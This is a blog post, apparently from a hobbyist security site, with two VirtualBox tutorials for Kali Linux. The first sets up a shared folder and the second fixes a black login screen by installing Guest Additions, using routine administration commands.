Hello world, welcome to haxez where today I want to talk about creating a Kali Linux shared folder for your Virtual Machine. They are a useful feature that allows you to share files between your base operating system and your Virtual Machine. While Virtual Machines do have a bidirectional clipboard that allows you to copy to and from each machine. A shared folder allows for easy access to resources such as wordlists and other large files. Furthermore, they can be particularly useful if you have limited disk space on your Virtual Machine.

Creating A Kali Shared Folder

In VirtualBox, this is a fairly simple process. First, you need to select the Virtual Machine that you want to add the shared folder to and click settings.

Creating A Kali Shared Folder
Creating A Shared Folder

Once the settings menu opens you need to navigate to the Shared Folders section in the left-hand column.

Adding A Shared Folder
Adding A Shared Folder

Next, click the blue folder icon with the green plus sign and that will pop up a window with a number of options.

Folder Options

The Folder Path option lets you select where on your base Operating System you want your folder to be. Folder Name allows you to give your folder a specific name when accessing it on your Virtual Machine. The Read-Only option prevents you from making changes to any of the files in the shared directory. Do not tick this if you want to be able to modify your folders. Auto-mount ensures that the folder is mounted on your Virtual Machine once it boots. You want to enable this option. Mount Point specifies where on the Virtual Machine you want it to mount. If you leave this empty then it should default to the /media directory.

Shared Folder Settings
Shared Folder Settings

Accessing Kali Shared Folder

With the settings saved, boot your Virtual Machine and login to the Desktop Environment. Then launch your file manager or file explorer. On the left-hand side, you should see a Devices section containing your File System and your Shared Folder. If not then it could be that you haven’t installed your Virtual Box guest additions.

File Manager
File Manager

Permissions Issues

If you can see the folder but aren’t able to access or create any files then it is likely due to user permissions. In order to resolve this issue, you need to add your user to the VirtualBox users group. This can be done by running the following command.

sudo adduser $USER vboxsf

You should now be able to access the shared folder. It is unlikely that you will need to reboot the machine but if the problem persists then reboot and try again.

Fixing VirtualBox Kali Linux Black Screen

Hello friends and welcome to haxez. So, you have run in to the VirtualBox Kali Linux Black Screen Bug? After all that effort spent downloading it and importing the appliance, you’re excited, you attempt to login in and… nothing. Just a black screen. How disappointing. Do you reinstall it? Give up? Or do you fix it and add that knowledge to your mind palace.

The Cause Of The Kali Linux Black Screen

The likely cause of this problem is due to the VirtualBox Guest Additions either not being installed or not being the correct version. Either way, we need to get them installed to rule this out as a problem.

Kali Linux Black Screen Kali Linux — Login
Kali Linux — Login

Grab A Shell

Start the Virtual Machine and wait for it to get to the login prompt. Before logging in press your right CTRL key (VirtualBox host key) and your F2 key. If you ever need to do this natively on Linux then it will be left CTRL, ALT and F2. This sends a signal to the operating system to spawn a virtual text only terminal or a TTY. To get back to the Desktop environment you need to press left CTRL and F8.

Kali Linux Black Screen Kali Linux — TTY Shell
Kali Linux — TTY Shell

Install The Guest Additions

Now login to the Operating System using your credentials. If it is a Kali Virtual Machine downloaded from their website then the credentials are likely either username: kali, password: kali or username: root, password: toor. Once you have logged in you need to instruct VirtualBox to mount the guest additions CD. From the menu, Devices > Insert Guest Additions CD Image.

VirtualBox — Insert Guest Additions CD
VirtualBox — Insert Guest Additions CD

Kali Linux Black Screen Mount The cdrom

In order to access the content of the Guest Additions CD, you first need to mount it. You could create a mountpoint manually or you could run the following command. As you can see, the command is mounting the device ‘cdrom’ (denoted by the ‘/dev/’ directory) to ‘/media/cdrom’ directory.

sudo mount /dev/cdrom /media/cdrom

Now, if you list out the contents of the ‘/media/cdrom’ directory you should see a file called VBoxLinuxAdditions.run.

Mounting The CD
Mounting The CD

Install The Guest Additions

In order to install the Guest Additions you need to run that VBoxLinuxAdditions.run file. To do this simply run the following command.

sudo /media/cdrom/VBoxLinuxAdditions.run

You may be prompted to press enter but wait for the process to complete and then reboot your system with the reboot command.

sudo reboot
Installing The Guest Additions
Installing The Guest Additions

Login In

Once the system has been rebooted, try logging in with your username and password. Hopefully you should now be presented with your desktop and are able to go about your hacking activities.

Kali Linux Desktop
Kali Linux Desktop

Other Suggestions For Kali Linux Black Screen

If for some reason that didn’t work then there are some other things you could try. One of the other common reasons for this error is due to the display settings. Although changing this has never resolved the problem for me, I thought it was worth a mention. In VirtualBox, head to the settings and then the display settings. Try toggling 3D acceleration and changing the amount of video memory. I’ve heard this has resolved the issue for other people but again I’ve never been able to resolve the problem this way.

Display Settings
Display Settings